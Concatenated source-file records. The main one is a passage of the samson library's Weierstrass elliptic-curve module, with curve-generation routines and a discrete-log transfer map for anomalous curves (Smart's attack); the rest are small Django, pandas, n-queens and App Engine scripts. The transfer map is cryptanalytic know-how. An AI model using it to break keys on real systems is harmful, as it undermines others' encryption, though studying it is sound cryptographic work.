- t\n\n elif not P*(E.p + 1 + t):\n return E.p + 1 + t\n\n # While we're here, let's get the order\n for t in sols:\n order = try_trace(t)\n if order:\n break\n\n if order:\n E.cardinality_cache = order\n\n return E\n else:\n raise NoSolutionException\n\n\n generate_curve_with_D = from_D\n\n\n @staticmethod\n def _generate_curve_with_odd_trace_fast(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n References:\n \"Generating Anomalous Elliptic Curves\" (http://www.monnerat.info/publications/anomalous.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n if not trace % 2:\n raise ValueError(\"Algorithm can only generate curves with odd trace\")\n\n\n # Prime D's congruent to 3 % 8\n # Sage code to generate:\n\n # D_MAP = {}\n # for i in range(1, 10000):\n # D = -(3+8*i)\n # if is_prime(-D):\n # roots = hilbert_class_polynomial(D).roots()\n # if roots:\n # D_MAP[D] = roots[0][0]\n\n\n abs_trace = abs(trace)\n valid_Ds = [D for D in _D_MAP if gcd(D, abs_trace) == 1]\n\n # `trace` can't be 5430965739045 mod 10861931478090 or 2277501761535 mod 4555003523070\n # (odd multiples of 3*5*7*17*13 and 3*5*7*17*31, which are the minimum factors to not be coprime to any of our discriminants)\n if not valid_Ds:\n raise ValueError(\"Odd trace algorithm cannot find suitable discriminant\")\n\n\n D = valid_Ds[0]\n m_size = (2**bit_size // D).bit_length() // 2\n\n # Find a prime such that 4p = x^2 + Dy^2, and x=trace\n # This construction will force the trace to be +-x\n while True:\n m = random_int_between(2**(m_size-1)+3, 2**m_size)\n m -= (m % 4)-1\n p = D*m*(m+1) + (D + abs_trace**2) // 4\n\n if p.bit_length() == bit_size and is_prime(p) and not (4*p - abs_trace**2) % D:\n y2 = (4*p - abs_trace**2) // D\n if ZZ(y2).is_square():\n break\n\n\n # Find a j-invariant\n R = ZZ/ZZ(p)\n E = EllipticCurve.from_D(D, R)\n P = E.random()\n\n if 
P*(p+1-trace):\n E = E.quadratic_twist()\n\n E.cardinality_cache = p+1-trace\n return E\n\n\n @staticmethod\n def _generate_curve_with_odd_trace_slow(bit_size: int, trace: int) -> 'WeierstrassCurve':\n from samson.math.algebra.rings.integer_ring import ZZ\n\n # These discriminants were selected since they are coprime with\n # the ones used in the \"fast\" algorithm like so:\n # l = lcm(11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427)\n # possible = [d for d in range(1000) if -d % 4 in [0, 1] and gcd(d, l) == 1 and d % 2 == 1]\n\n # This shows there's a lot of possible curves even for the smallest value:\n # congruence_bits = (10861931478090).bit_length()\n # approx_primes = pnt(2**congruence_bits)-pnt(2**(congruence_bits-1))\n # num_squares = kth_root(approx_primes // 59, 2)\n\n\n for D in [59, 71, 79, 83, 103, 107, 127, 131, 139, 151]:\n start = 2**(bit_size-1) + 2**(bit_size-2) + 1\n start -= trace**2\n start //= D\n start *= 4\n first_root = kth_root(start, 2)\n\n i = random_int(2**(bit_size // 4) // D)\n p = 0\n while p.bit_length() <= bit_size:\n r = first_root + i\n p = (r**2*D + trace**2) // 4\n i += 1\n\n if p.bit_length() == bit_size and is_prime(p):\n try:\n R = ZZ/ZZ(p)\n E = EllipticCurve.generate_curve_with_D(D, R)\n if E.trace() == trace:\n return E\n elif E.trace() == -trace:\n return E.quadratic_twist()\n\n except NoSolutionException:\n pass\n \n raise NoSolutionException(\"No suitable discriminant/prime found\")\n\n\n\n @staticmethod\n def _generate_curve_with_even_trace(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n References:\n \"ELLIPTIC CURVES OF NEARLY PRIME ORDER.\" (https://eprint.iacr.org/2020/001.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def build_curve(p, a, negate):\n mod = -negate*2 + 1\n R = ZZ/ZZ(p)\n o = p + 1 + a*2\n E = EllipticCurve(R(mod*a), R(0))\n\n if not E.random()*o:\n E.cardinality_cache = o\n return E\n\n E = E.quadratic_twist()\n\n if not E.random()*o:\n E.cardinality_cache = o\n return E\n\n\n\n # Uses primes that are 5 mod 8\n # Cannot tolerate traces divisible by 8\n def five_mod_eight_gen(p, a):\n E = None\n if p % 8 == 5:\n pdash = (p-3) // 2\n\n if is_prime(pdash):\n E = build_curve(p, a, False)\n\n\n pbar = (p+5) // 2\n if is_prime(pbar):\n E = build_curve(p, a, True)\n\n return E\n\n\n # Uses primes that are 1 mod 8\n # Only generates traces divisible by 4\n def one_mod_eight_gen(p, a):\n R = ZZ/ZZ(p)\n while True:\n k = R.random()\n if not k.is_square():\n break\n\n E = EllipticCurve(-k, R(0))\n o = p + 1 - 2*a\n if E.random()*o:\n E = E.quadratic_twist()\n\n E.cardinality_cache = o\n return E\n\n\n\n if trace % 2:\n raise ValueError(\"Even trace algorithm can only generate curves with even trace\")\n\n\n if trace % 8:\n curve_gen_func = five_mod_eight_gen\n else:\n curve_gen_func = one_mod_eight_gen\n\n\n # The algorithm fails if trace is negative\n # Instead, remove the negative and return the twist at the end\n abs_trace = trace\n if trace < 0:\n abs_trace = -trace\n\n\n # p must be [1, 5] mod 8\n # If a is odd, then b should be even\n a = abs_trace // 2\n b_size = (2**bit_size - a**2).bit_length() // 2\n b = 2**(b_size-1) + 2**(b_size-2) - random_int(2**(b_size-5))*2 + ((a+1) % 2)\n max_b = 2**b_size\n\n E = None\n while b < max_b:\n b += 2\n p = a**2 + b**2\n if is_prime(p):\n E = curve_gen_func(p, a)\n\n if E:\n if E.trace() != trace:\n E = E.quadratic_twist()\n return E\n\n\n raise SearchspaceExhaustedException\n\n\n\n @staticmethod\n def 
generate_curve_with_order(order: int, max_r: int=20) -> 'WeierstrassCurve':\n \"\"\"\n Generates the curve with the prescribed order.\n\n Parameters:\n order (int): Order of the curve to generate.\n\n Returns:\n WeierstrassCurve: Generated curve.\n\n References:\n \"Constructing elliptic curves of prime order\" (http://www.math.leidenuniv.nl/~psh/bs.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def construct_prime(N: int, max_r: int):\n from samson.math.factorization.factors import Factors\n from math import log2\n\n logN = int(log2(N))\n Zn = ZZ/ZZ(N)\n\n for r in range(max_r):\n S = {}\n\n op = [p for p in primes(max(r*logN, 3), (r+1)*logN) if (ZZ/ZZ(p))(N).is_square()]\n S = [Zn(p) for p in op if Zn(p).is_square()]\n\n fac = Factors({p:1 for p in S})\n for i in range(1, len(S)+1):\n for l in fac.combinations(i):\n D = int(l.recombine())\n\n if -D % 8 == 5:\n try:\n for t in _get_possible_traces_for_D(D, N):\n for trace in [t, -t]:\n prime = N + 1 - trace\n\n if is_prime(prime):\n return D, prime\n\n except NoSolutionException:\n pass\n\n raise NoSolutionException\n\n # Find suitable prime and discriminant\n D, p = construct_prime(order, max_r)\n Zp = ZZ/ZZ(p)\n E = EllipticCurve.from_D(D, Zp)\n\n # Either this curve or the twist has the correct order\n if E.random()*order:\n E = E.quadratic_twist()\n\n E.cardinality_cache = order\n return E\n\n\n\n @staticmethod\n def generate_curve_with_prime_order(size: int, return_both: bool=False) -> 'WeierstrassCurve':\n \"\"\"\n Generates a curve with a prime order. This method actually finds two prime curves,\n so the `return_both` determines whether to include the second.\n\n Parameters:\n size (int): Size in bits of the curve to generate.\n return_both (bool): Whether or not to return both prime curves.\n\n Returns:\n WeierstrassCurve: Generated curve.\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n d_fields = [ZZ/ZZ(d) for d in _D_MAP]\n\n while True:\n p = find_prime(size)\n R = ZZ/ZZ(p)\n\n for DR in d_fields:\n d = DR.characteristic()\n\n if DR(p).is_square() and R(d).is_square():\n try:\n for t,_ in cornacchias_algorithm(d, 4*p, all_sols=True):\n for trace in [t, -t]:\n n = p+1-trace\n\n if is_prime(n):\n E1 = EllipticCurve.generate_curve_with_D(d, R)\n\n if E1.random()*n:\n E1 = E1.quadratic_twist()\n\n\n result = E1\n\n if return_both:\n E2 = EllipticCurve.generate_curve_with_D(d, ZZ/ZZ(n))\n\n if E2.random()*p:\n E2 = E2.quadratic_twist()\n \n result = (E1, E2)\n\n return result\n\n except NoSolutionException:\n pass\n\n\n @staticmethod\n def generate_curve_with_k_embedding_subgroup(bits: int, k: int) -> Tuple['WeierstrassCurve', WeierstrassPoint]:\n \"\"\"\n Generates a curve with a *subgroup* whose embedding degree is `k`.\n\n Parameters:\n bits (int): Size of the underlying finite field.\n k (int): Desired embedding degree.\n\n Returns:\n Tuple[WeierstrassCurve, WeierstrassPoint]: The constructed curve and a generator of the subgroup.\n \n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> E, g = EllipticCurve.generate_curve_with_k_embedding_subgroup(80, 12)\n >>> (E.ring.characteristic().bit_length(), g.embedding_degree())\n (80, 12)\n\n References:\n \"Constructing Elliptic Curves with Prescribed Embedding Degrees\" (https://eprint.iacr.org/2002/088.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n from samson.math.symbols import oo\n \n # First we need to estimate the starting point\n # Since `r` will be 
~l^(c.degree()), m~r, and q = m*r\n # we get the following `start`\n c = cyclomotic_polynomial(k)\n start = 2**((bits // c.degree() // 2)-3)\n\n # This is just to add some randomness\n l = start - random_int(bits*2)\n\n # There's not a super good way to estimate when increasing evaluations of the poly\n # will no longer be within our range.\n last_attempts = []\n attempt_memory = 20\n\n while True:\n l += 1\n r = c(l)\n if not r.is_prime():\n continue\n\n t = l+1\n A = 4*r\n B = (l-1)**2\n attempt_min = oo\n\n for D in [3, 7, 11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427]:\n MD = ZZ/ZZ(D)\n mdA = MD(A)\n\n if not mdA.is_invertible():\n continue\n\n m0 = ZZ(MD(B)/mdA)\n z0 = (A*m0-B) // D\n MR = ZZ/r\n mrZ = MR(z0)\n\n if not mrZ.is_square():\n continue\n\n V = ZZ(mrZ.sqrt())\n if (V**2 - z0) % 4:\n continue\n\n i0 = (V**2 - z0) // A\n mi = m0 + i0.val*D\n\n n = mi*r\n q = n+t-1\n\n attempt_min = min(q.val.bit_length(), attempt_min)\n\n if q.val.bit_length() == bits and q.is_prime():\n if all(pow(int(q), i, int(r)) != 1 for i in range(1,k)) and pow(int(q), k, int(r)) == 1:\n E = EllipticCurve.generate_curve_with_D(D, ZZ/q)\n\n # Did we get a good curve?\n if E.trace() in [t, -t]:\n if E.trace() != t:\n E = E.quadratic_twist()\n \n g = E.find_gen()\n return E, g*int((g.order() // r))\n\n\n last_attempts.append(attempt_min)\n last_attempts = last_attempts[-attempt_memory:]\n\n if len(last_attempts) == attempt_memory:\n # Here we predict whether it's feasible `r` will ever be the right size\n # based on past attempts\n if all([attempt_bits > bits for attempt_bits in last_attempts]):\n raise SearchspaceExhaustedException\n\n # If we're always too low, let's use the past attempts to predict\n # how big of jump we can make. Note, we clear `last_attempts` to prevent\n # making multiple jumps without sampling a new `error_ratio`.\n elif all([attempt_bits < bits for attempt_bits in last_attempts]):\n avg = sum(last_attempts) / attempt_memory\n error_ratio = bits / avg\n l += int(l * error_ratio * 0.1)\n last_attempts = []\n\n\n @staticmethod\n def generate_curve_with_k12_prime_order(bits: int) -> 'WeierstrassCurve':\n \"\"\"\n Generates a curve with prime order and embedding degree 12.\n\n Parameters:\n bits (int): Desired size of underlying field.\n\n Returns:\n WeierstrassCurve: Prime-order curve with an embedding degree of 12.\n\n References:\n \"Pairing-Friendly Elliptic Curves of Prime Order\" (https://eprint.iacr.org/2005/133.pdf)\n \"\"\"\n from samson.utilities.general import binary_search_unbounded, lazy_shuffle\n from samson.math.symbols import Symbol\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def gen_curve_params():\n x = Symbol('x')\n _ = ZZ[x]\n P = 36*x**4 + 36*x**3 + 24*x**2 + 6*x + 1\n T = 6*x**2 + 1\n\n start = binary_search_unbounded(lambda n: P(-n).val.bit_length() < bits)\n end = binary_search_unbounded(lambda n: P(-n).val.bit_length() < (bits+1))\n\n for l in lazy_shuffle(range(start, end)):\n t = int(T(l))\n for val in (-l, l):\n p = int(P(val))\n n = p + 1 - t\n if is_prime(p) and is_prime(n):\n return p, n\n\n\n p, n = gen_curve_params()\n R = ZZ/ZZ(p)\n b = R(0)\n\n while True:\n b += 1\n while not (b+1).is_square():\n b += 1\n\n y = (b+1).sqrt()\n E = EllipticCurve(R(0), b)\n G = E(1, y)\n\n if not G*n:\n E.cardinality_cache = n\n return E\n\n\n\n @RUNTIME.global_cache()\n def to_montgomery_form(self) -> ('MontgomeryCurve', Map):\n \"\"\"\n Finds an equivalent Montgomery curve if it exists.\n\n Returns:\n (MontgomeryCurve, Map): 
Formatted as (equivalent MontgomeryCurve, map to convert points).\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> # Generate a curve with order divisble by 4\n >>> E = EllipticCurve.generate_curve_with_trace(80, 6)\n >>> M, phi = E.to_montgomery_form()\n >>> P = E.random()\n >>> d = random_int(P.order())\n >>> Q = P*d\n >>> phi(P)*d == phi(Q)\n True\n\n References:\n https://en.wikipedia.org/wiki/Montgomery_curve#Equivalence_with_Weierstrass_curves\n \"\"\"\n from samson.math.symbols import Symbol\n from samson.math.algebra.curves.montgomery_curve import MontgomeryCurve\n\n # Order must be divisible by 4\n if self.order() % 4:\n raise NoSolutionException(\"Order must be divisible by 4\")\n\n\n z = Symbol('z')\n _ = self.ring[z]\n\n # Curve equation must have roots\n roots = self.defining_polynomial().roots()\n\n if not roots:\n raise NoSolutionException(\"Curve equation has no roots\")\n\n\n # Derivative at root must be a square\n for alpha in roots:\n delta = 3*alpha**2 + self.a\n\n if not delta.is_square():\n continue\n\n s = ~delta.sqrt()\n\n if self.G_cache:\n x, y = s*(self.G.x-alpha), self.G.y*s\n else:\n x, y = None, None\n \n A = 3*alpha*s\n curve = MontgomeryCurve(A=A, B=s, U=x, V=y, order=self.order() // 2)\n\n inv_B = ~s\n inv_B3 = ~(s*3)\n\n def inv_map_func(point):\n return self((point.x*inv_B) + (A*inv_B3), point.y*inv_B)\n\n point_map = Map(self, curve, lambda point: curve(s*(point.x-alpha), s*point.y), inv_map=inv_map_func)\n return curve, point_map\n\n raise NoSolutionException(\"'delta' is not a quadratic residue\")\n\n\n def element_at(self, x: int) -> WeierstrassPoint:\n \"\"\"\n Returns the `x`-th element w.r.t to the generator.\n\n Parameters:\n x (int): Element ordinality.\n\n Returns:\n WeierstrassPoint: The `x`-th point.\n \"\"\"\n return self.G*x\n\n\n def recover_point_from_x(self, x: int) -> WeierstrassPoint:\n \"\"\"\n Uses the curve equation to create a point with x-coordinate `x`.\n\n Parameters:\n x (int): x-coordinate.\n \n Returns:\n WeierstrassPoint: Point at x-coordinate.\n \"\"\"\n x = self.ring(x)\n y = (x**3 + self.a*x + self.b).sqrt()\n return WeierstrassPoint(x, y, self)\n\n\n def random(self, size: 'RingElement'=None) -> WeierstrassPoint:\n \"\"\"\n Generate a random element.\n\n Parameters:\n size (RingElement): The ring-specific 'size' of the element.\n \n Returns:\n WeierstrassPoint: Random element of the algebra.\n \"\"\"\n while True:\n try:\n return self.recover_point_from_x(self.ring.random(size))\n except NoSolutionException:\n pass\n\n\n def division_poly(self, n: int) -> Polynomial:\n \"\"\"\n Finds the `n`-th division polynomial.\n\n Parameters:\n n (int): Index of division polynomial.\n\n Returns:\n Polynomial: Division polynomial of the curve.\n \"\"\"\n if n in self.dpoly_cache:\n return self.dpoly_cache[n]\n\n x = self.curve_poly_ring.poly_ring.symbol\n\n a, b = self.a, self.b\n d_poly = None\n\n if n == -1:\n d_poly = self.curve_poly_ring(4*x**3 + 4*a*x + 4*b)\n\n elif n in [0, 1]:\n d_poly = self.curve_poly_ring(n)\n\n elif n == 2:\n d_poly = self.curve_poly_ring((0, 2))\n\n elif n == 3:\n d_poly = self.curve_poly_ring(3*x**4 + 6*a*x**2 + 12*b*x - a**2)\n\n elif n == 4:\n d_poly = self.curve_poly_ring((0, 4*x**6 + 20*a*x**4 + 80*b*x**3 - 20*a**2*x**2 - 16*a*b*x - 4*a**3 - 32*b**2))\n\n else:\n y = self.curve_poly_ring((0, 1))\n two = self.curve_poly_ring.poly_ring([2])\n psi = self.division_poly\n\n for j in range(5, n+1):\n k, m = divmod(j, 2)\n\n if m:\n self.dpoly_cache[j] = 
psi(k+2) * psi(k)**3 - psi(k+1)**3 * psi(k-1)\n else:\n if k % 2 == 0:\n self.dpoly_cache[j] = self.curve_poly_ring((psi(k).y_poly // two)) * (psi(k+2) * psi(k-1)**2 - psi(k-2) * psi(k+1)**2)\n else:\n self.dpoly_cache[j] = y * (psi(k).x_poly // two) * (psi(k+2) * psi(k-1).y_poly**2 - psi(k-2) * psi(k+1).y_poly**2)\n\n d_poly = self.dpoly_cache[n]\n\n\n self.dpoly_cache[n] = d_poly\n\n return d_poly\n\n\n def _division_polynomials_mod(self, n: int, mod: Polynomial):\n a, b = self.a, self.b\n x = Symbol('x')\n R = self.ring\n P = R[x]\n P = P/mod\n x = P(x)\n\n div = {}\n div2 = {}\n div02 = {}\n\n div[-1] = 4*x**3 + 4*a*x + 4*b\n div[0] = R(0)\n div[1] = R(1)\n div[2] = R(1)\n div[3] = 3*x**4 + 6*a*x**2 + 12*b*x - a**2\n div[4] = 2*(x**6 + 5*a*x**4 + 20*b*x**3 - 5*a**2*x**2 - 4*a*b*x - a**3 - 8*b**2)\n\n f = P(self.defining_polynomial())\n\n # Initialize caches\n if not div2:\n for i in range(5):\n div2[i] = div[i]*div[i]\n\n for i in range(3):\n div02[i] = div[i]*div[i+2]\n\n\n ff16 = 16*f*f\n for i in range(5, n+1):\n k, m = divmod(i, 2)\n dkk = div02[k]*div2[k]\n dk1 = div02[k-1]*div2[k+1]\n\n if m:\n if k % 2 == 0:\n pol = ff16*dkk-dk1\n else:\n pol = dkk-ff16*dk1\n else:\n pol = (div02[k]*div2[k-1]-div02[k-2]*div2[k+1])\n \n div[i] = pol\n div2[i] = pol*pol\n div02[i-2] = div[i-2]*div[i]\n\n return div, div2, div02\n\n\n\n def abelian_group_generators(self) -> (WeierstrassPoint, WeierstrassPoint):\n \"\"\"\n Finds two generators that together fully generate the curve. This is useful when\n the curve is isomorphic to a direct product of two abelian additive groups and not\n just one.\n\n Returns:\n (WeierstrassPoint, WeierstrassPoint): Formatted as (Generator of group one, generator of group two).\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> R = ZZ/ZZ(828109)\n >>> a = R(654207)\n >>> b = R(0)\n >>> card = 828104\n >>> E = EllipticCurve(a, b, cardinality=card)\n >>> G1, G2 = E.abelian_group_generators()\n >>> G1.order()*G2.order() == E.order()\n True\n\n >>> G1.linear_relation(G2)[0] == 0\n True\n\n References:\n https://github.com/sagemath/sage/blob/ca088c9c9326542accea1f878e791b82cb37a3e1/src/sage/schemes/elliptic_curves/ell_finite_field.py#L843\n \"\"\"\n P = self.zero\n N = self.order()\n\n while True:\n Q = 0\n while not Q:\n Q = self.random()\n\n if Q*P.order():\n P = P.merge(Q)\n else:\n n1 = P.order()\n n1a = n1 // gcd(n1, N // n1)\n n1b = n1 // n1a\n\n if n1 == N:\n return P, self.zero\n\n if self.order() // n1 == n1b:\n Z = P*n1a\n\n while True:\n Q = self.random()\n if not Q.order() % n1b:\n W = Q*(Q.order() // n1b)\n\n if W != Z:\n return P, W\n\n\n\n @RUNTIME.global_cache()\n def additive_transfer_map(self) -> 'Map':\n \"\"\"\n Generates a map to `Qp` such that if `Q` = `P`*`d`, then `phi(Q)` = `phi(P)`*`d`.\n\n Returns:\n Map: Map function.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> E = EllipticCurve.generate_curve_with_trace(256, 1)\n >>> g = E.G\n >>> d = random_int(g.order())\n >>> q = g*d\n >>> phi = E.additive_transfer_map()\n >>> int((phi(q)/phi(g))[0]) == d\n True\n\n References:\n https://www.hpl.hp.com/techreports/97/HPL-97-128.pdf\n https://hxp.io/blog/25/SharifCTF-2016-crypto350-British-Elevator-writeup/\n \"\"\"\n from samson.math.algebra.rings.padic_numbers import Qp\n E = self\n p = E.ring.characteristic()\n\n if self.random() * p:\n raise ValueError(f\"{E} is not trace one\")\n\n\n # Move 
everything into p-adic numbers\n        Qp2 = Qp(p, 8)\n        QpA = Qp2(E.a)\n        QpB = Qp2(E.b)\n        Ep = EllipticCurve(QpA, QpB)\n        formal_log = Ep.formal_group().log()\n\n        # Lift points to the new curve\n        def lift_point(x, y):\n            Qpy = (x ** 3 + QpA * x + QpB).sqrt()\n            QpP = Ep(x, (-Qpy, Qpy)[Qpy.val[0] == y])\n            return QpP\n        \n\n        def add_trans(P):\n            QpxP = Qp2(P.x)\n            PQp = lift_point(QpxP, P.y)\n            pPQp = p * PQp\n            tP = -pPQp.x / pPQp.y\n            return formal_log(tP) / p\n\n        return Map(E, Qp2, add_trans)\n\n\n\nEllipticCurve = WeierstrassCurve\n","repo_name":"wildcardcorp/samson","sub_path":"samson/math/algebra/curves/weierstrass_curve.py","file_name":"weierstrass_curve.py","file_ext":"py","file_size_in_byte":67989,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"32"}
+{"seq_id":"31808190912","text":"def frequency_distribution(sequence):\n    frequency = {}\n\n    for value in sequence:\n        if value in frequency:\n            frequency[value] += 1\n        else:\n            frequency[value] = 1\n\n    return frequency\n\nlst = [2,2,9,1,2,2,1,4,2,2,3,1]\nresult = frequency_distribution(lst)\nprint(result)\n\n\n# lst = []\n# n = int(input(\"total numbers ? \"))\n# for i in range (n):\n#     lst[i] = int(input(f'enter number #{i+1} '))\n\n# seq = [1,1,1,1,1,-1,0,-2,-1]\n# dict={}\n# i = 0\n# count = 0\n# while i < len(seq):\n#     if(seq[i] in dict):\n#         count += 1\n#         dict.update({seq[i]:count})\n#     else:\n#         dict[seq[i]] = 1\n#         count = 1\n#     i+=1\n# print(dict)","repo_name":"Ritesh1312/Python_Training_Assignments","sub_path":"Assignment_2/frequency_distribution.py","file_name":"frequency_distribution.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"73147030810","text":"from django.conf.urls import url\nfrom .views import Home, home_en, home_kn\n\nurlpatterns = [\n    url('^en/$', home_en, name='homeen'),\n    url('^kn/$', home_kn, name='homekn'),\n    url('^$', Home, name='home'),\n]\n\napp_name = 'olora_frontend'\n","repo_name":"aiegoo/django-blog","sub_path":"sandbox/apps/olora_frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16709355413","text":"import pandas as pd\n\n# Load the CSV file\ndf = pd.read_csv('rugby_dataset.csv')\n\n# Convert the 'date' column to datetime format\ndf['date'] = pd.to_datetime(df['date'])\n\n# Keep only the rows from 2013 onwards\ndf = df[df['date'].dt.year >= 2013]\n\n# Save the new DataFrame to a new CSV file\ndf.to_csv('rugby_filtered.csv', index=False)\n","repo_name":"estebanbaigts/world_cup_rugby_algo","sub_path":"sort_rugby.py","file_name":"sort_rugby.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27672367025","text":"from django.contrib import admin\n\nfrom .models import Incident, SocialMediaIncident, CloseEndQs, CloseEndQsChoice\n\nfrom django.contrib.auth.models import Group\n\n\n#class IncidentAdmin(admin.ModelAdmin):\n#    readonly_fields = ['name', 'latitude', 'longitude', 'disaster_type',\n#                       'contact_no', 'address', 'synced_date', 'reported_date',\n#                       'description']\n\n    #def has_add_permission(self, request):\n    #    return False\n\n    #def has_delete_permission(self, request, obj=None):\n    #    return False\n\n    #def has_save_permission(self, request, obj=None):\n    #    return False\n\nclass 
ChoiceInline(admin.StackedInline):\n model = CloseEndQsChoice\n #extra = 3\n\n\nclass CloseEndQsAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['question']}),\n ]\n inlines = [ChoiceInline]\n\n#admin.site.register(Incident, IncidentAdmin)\nadmin.site.register(Incident)\nadmin.site.register(SocialMediaIncident)\nadmin.site.unregister(Group)\nadmin.site.register(CloseEndQs, CloseEndQsAdmin)\n\n","repo_name":"GeoEDGE/cfr_web","sub_path":"incidents/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2892724382","text":"#!/usr/bin/env python\n\"\"\"N-queens problem\nDeep first search using basic list of list grid\n\"\"\"\n\n\nclass Board:\n def __init__(self, size):\n self.size = size\n self.boxes = [[0 for c in range(size)] for r in range(size)]\n\n def solve(self, col):\n if col >= self.size:\n return True\n for row in range(self.size):\n if self.allow(row, col):\n self.boxes[row][col] = 1\n if self.solve(col + 1):\n return True\n self.boxes[row][col] = 0\n return False\n\n def allow(self, row, col):\n # Check this row on left side\n for c in range(col):\n if self.boxes[row][c]:\n return False\n # Check upper diagonal on left side\n for r, c in zip(range(row, -1, -1), range(col, -1, -1)):\n if self.boxes[r][c]:\n return False\n # Check lower diagonal on left side\n for r, c in zip(range(row, self.size), range(col, -1, -1)):\n if self.boxes[r][c]:\n return False\n return True\n\n def display(self):\n for row in range(self.size):\n for col in range(self.size):\n if self.boxes[row][col]:\n print(\"* \", end=\"\")\n else:\n print(\". \", end=\"\")\n print()\n\n\ndef main(size=18):\n print(f\"solving for size {size}:\")\n board = Board(size)\n if board.solve(0):\n board.display()\n else:\n print(\"No solution.\")\n\n\nif __name__ == \"__main__\":\n import sys\n from time import perf_counter\n\n t0 = perf_counter()\n main(int(sys.argv[1]))\n print(f\"duration: {perf_counter() - t0:.3f}s\")\n","repo_name":"abilian/cythonplus-sandbox","sub_path":"exemples/n-queens/py_basic_dfs/n_queens_basic_dfs.py","file_name":"n_queens_basic_dfs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73047095451","text":"\"\"\"Customer Model\"\"\"\nfrom google.appengine.ext import ndb\n\nfrom server.common.util import get_ancestor_key, parse_id, populate\nfrom server.models.order_model import Order\n\n\nclass Customer(ndb.Model):\n \"\"\"The Customer Model definition.\"\"\"\n first_name = ndb.StringProperty()\n last_name = ndb.StringProperty()\n email = ndb.StringProperty()\n phone = ndb.StringProperty()\n\n def as_dict(self, orders=[]):\n \"\"\"Converts the datastore reponse into a JSON parsable dictionary.\"\"\"\n return {\n 'id': self.key.id(),\n 'first_name': self.first_name,\n 'last_name': self.last_name,\n 'email': self.email,\n 'phone': self.phone,\n 'orders': orders\n }\n\n @property\n def orders(self):\n return Order.query(ancestor=self.key)\n\n\ndef all():\n \"\"\"Gets all the items for a resource.\"\"\"\n customers = Customer.query(ancestor=get_ancestor_key())\n\n # Loop through each customer. 
For each customer, fetch their orders.\n    results = []\n    for i, customer in enumerate(customers):\n        orders = list(customer.orders.fetch())\n        orders_dict = [order.as_dict() for order in orders]\n        results.append(customer.as_dict(orders_dict))\n\n    return results\n\n\ndef create(body):\n    \"\"\"Creates a new record for the resource.\"\"\"\n    customer = Customer(parent=get_ancestor_key())\n    customer = populate(Customer, customer, body)\n    customer.put()\n    return customer.as_dict()\n","repo_name":"dlochrie/ph-datastore","sub_path":"server/models/customer_model.py","file_name":"customer_model.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33792442427","text":"from django.shortcuts import render, redirect\nfrom .models import Book\nfrom .models import Author \n\ndef index(request):\n    context = {\n        \"all_the_books\": Book.objects.all()\n    }\n    return render(request, \"books_authors_app/index.html\", context)\n\ndef book(request, my_val):\n    context = {\n        \"Book\": Book.objects.get(id=my_val),\n        \"Authors\": Book.objects.get(id=my_val).authors,\n        \"allauthors\": Author.objects.all(),\n    }\n    return render(request, \"books_authors_app/books.html\", context)\n\ndef add_book(request):\n    new_book = Book.objects.create(title=request.POST[\"new_title\"],desc=request.POST[\"desc\"])\n    return redirect(\"/books/\"+str(new_book.id))\n\ndef add_author(request):\n    new_author= Author.objects.create(first_name=request.POST[\"first_name\"],last_name=request.POST[\"last_name\"],notes=request.POST[\"notes\"])\n    return redirect(\"/authors/\"+str(new_author.id))\n\ndef index2(request):\n    context = {\n        \"all_the_authors\": Author.objects.all()\n    }\n    return render(request, \"books_authors_app/index2.html\", context)\n\n\ndef author(request, my_val):\n    context = {\n        \"Author\": Author.objects.get(id=my_val),\n        \"Books\": Author.objects.get(id=my_val).books,\n        \"allbook\": Book.objects.all(),\n    }\n    return render(request, \"books_authors_app/authors.html\", context)\n\ndef addbooktoauthor(request):\n    if request.method == \"POST\":\n        id = request.POST[\"authors\"]\n        author = Author.objects.get(id=id)\n        book_id = request.POST[\"bookid\"]\n        books = Book.objects.get(id=book_id)\n        author.books.add(books)\n\n    return redirect('/author/' + id)\n\n\ndef addnewauthor(request):\n    if request.method == \"POST\":\n        first_name = request.POST[\"first_name\"]\n        last_name = request.POST[\"last_name\"]\n        notes = request.POST[\"notes\"]\n        new_author = Author.objects.create(first_name=first_name, last_name=last_name, notes=notes)\n\n    return redirect('/author/' + str(new_author.id))","repo_name":"kevindavidly/Books_Authors_Django","sub_path":"apps/books_authors_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
